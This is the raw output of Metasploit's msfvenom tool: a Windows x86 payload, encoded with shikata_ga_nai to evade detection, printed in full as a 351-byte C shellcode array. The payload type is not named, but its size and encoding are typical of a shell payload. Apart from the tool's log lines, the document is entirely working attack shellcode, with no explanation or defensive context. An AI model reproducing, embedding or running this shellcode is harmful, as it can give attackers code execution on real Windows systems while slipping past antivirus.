[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xd9\xe1\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\xc0\xf7\x46"
"\xda\x31\x53\x17\x83\xeb\xfc\x03\x93\xe4\xa4\x2f\xef\xe3\xab"
"\xd0\x0f\xf4\xcb\x59\xea\xc5\xcb\x3e\x7f\x75\xfc\x35\x2d\x7a"
"\x77\x1b\xc5\x09\xf5\xb4\xea\xba\xb0\xe2\xc5\x3b\xe8\xd7\x44"
"\xb8\xf3\x0b\xa6\x81\x3b\x5e\xa7\xc6\x26\x93\xf5\x9f\x2d\x06"
"\xe9\x94\x78\x9b\x82\xe7\x6d\x9b\x77\xbf\x8c\x8a\x26\xcb\xd6"
"\x0c\xc9\x18\x63\x05\xd1\x7d\x4e\xdf\x6a\xb5\x24\xde\xba\x87"
"\xc5\x4d\x83\x27\x34\x8f\xc4\x80\xa7\xfa\x3c\xf3\x5a\xfd\xfb"
"\x89\x80\x88\x1f\x29\x42\x2a\xfb\xcb\x87\xad\x88\xc0\x6c\xb9"
"\xd6\xc4\x73\x6e\x6d\xf0\xf8\x91\xa1\x70\xba\xb5\x65\xd8\x18"
"\xd7\x3c\x84\xcf\xe8\x5e\x67\xaf\x4c\x15\x8a\xa4\xfc\x74\xc3"
"\x09\xcd\x86\x13\x06\x46\xf5\x21\x89\xfc\x91\x09\x42\xdb\x66"
"\x6d\x79\x9b\xf8\x90\x82\xdc\xd1\x56\xd6\x8c\x49\x7e\x57\x47"
"\x89\x7f\x82\xc8\xd9\x2f\x7d\xa9\x89\x8f\x2d\x41\xc3\x1f\x11"
"\x71\xec\xf5\x3a\x18\x17\x9e\x4e\xd7\x16\x4f\x27\xe5\x18\x7e"
"\xeb\x60\xfe\xea\x03\x25\xa9\x82\xba\x6c\x21\x32\x42\xbb\x4c"
"\x74\xc8\x48\xb1\x3b\x39\x24\xa1\xac\xc9\x73\x9b\x7b\xd5\xa9"
"\xb3\xe0\x44\x36\x43\x6e\x75\xe1\x14\x27\x4b\xf8\xf0\xd5\xf2"
"\x52\xe6\x27\x62\x9c\xa2\xf3\x57\x23\x2b\x71\xe3\x07\x3b\x4f"
"\xec\x03\x6f\x1f\xbb\xdd\xd9\xd9\x15\xac\xb3\xb3\xca\x66\x53"
"\x45\x21\xb9\x25\x4a\x6c\x4f\xc9\xfb\xd9\x16\xf6\x34\x8e\x9e"
"\x8f\x28\x2e\x60\x5a\xe9\x5e\x2b\xc6\x58\xf7\xf2\x93\xd8\x9a"
"\x04\x4e\x1e\xa3\x86\x7a\xdf\x50\x96\x0f\xda\x1d\x10\xfc\x96"
"\x0e\xf5\x02\x04\x2e\xdc";
